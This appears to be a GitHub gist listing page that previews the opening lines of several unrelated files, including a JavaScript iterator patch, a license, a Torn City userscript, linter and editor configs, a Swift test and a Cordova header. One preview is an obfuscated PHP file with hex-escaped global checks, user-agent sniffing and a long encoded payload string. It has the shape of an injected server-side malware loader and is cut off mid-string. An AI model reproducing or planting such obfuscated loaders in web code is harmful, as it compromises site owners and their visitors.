This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Object.prototype[Symbol.iterator] = function() { | |
let obj = this; | |
let keyit = Object.keys(obj)[Symbol.iterator](); | |
return {next() { | |
let {done, value} = keyit.next(); | |
if (done) { | |
return {done}; | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Attribution-NoDerivatives 4.0 International | |
======================================================================= | |
Creative Commons Corporation ("Creative Commons") is not a law firm and | |
does not provide legal services or legal advice. Distribution of | |
Creative Commons public licenses does not create a lawyer-client or | |
other relationship. Creative Commons makes its licenses and related | |
information available on an "as-is" basis. Creative Commons gives no | |
warranties regarding its licenses, any material licensed under their |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==UserScript== | |
// @id torn-bazaar@zorgatone | |
// @name Torn City | Bazaar Enhancer | |
// @namespace zorgatone | |
// @include /^https?:\/\/www\.torn\.com\/bazaar\.php/ | |
// @author Zorgatone | |
// @version 0.0.9 | |
// @updateURL https://gist.githubusercontent.com/Zorgatone/e2a0794858e62b405aad/raw/torn-bazaar.user.js | |
// @grant none | |
// ==/UserScript== |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $vidirizvvr = '~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x*0f(-!#]y76]277]y72]25c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x78x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x787x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^j6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x782x7860UQPMSVD!-id%x5c%x%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%xw)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WY%x5c%x7860{66~6<&w6<<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x78223}!+!<+{e%x5c%x7%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;g%x5c%x787fw6*CW&)7gj6<*doj%x5c%x785c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fd%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;q |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"ecmaFeatures": { | |
"arrowFunctions": false, | |
"binaryLiterals": false, | |
"blockBindings": false, | |
"classes": false, | |
"defaultParams": false, | |
"destructuring": false, | |
"forOf": false, | |
"generators": false, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Your keymap | |
# | |
# Atom keymaps work similarly to style sheets. Just as style sheets use | |
# selectors to apply styles to elements, Atom keymaps use selectors to associate | |
# keystrokes with events in specific contexts. Unlike style sheets however, | |
# each selector can only be declared once. | |
# | |
# You can create a new keybinding in this file by typing "key" and then hitting | |
# tab. | |
# |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// | |
// swift-test-hello.swift | |
// Swift 2.1 tests | |
// | |
//import Foundation | |
class Person { | |
var name: String; | |
var surname: String?; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Platform: browser | |
// 6950f96eba7c2c0181bc76d98443446068e0ea1e | |
/* | |
Licensed to the Apache Software Foundation (ASF) under one | |
or more contributor license agreements. See the NOTICE file | |
distributed with this work for additional information | |
regarding copyright ownership. The ASF licenses this file | |
to you under the Apache License, Version 2.0 (the | |
"License"); you may not use this file except in compliance | |
with the License. You may obtain a copy of the License at |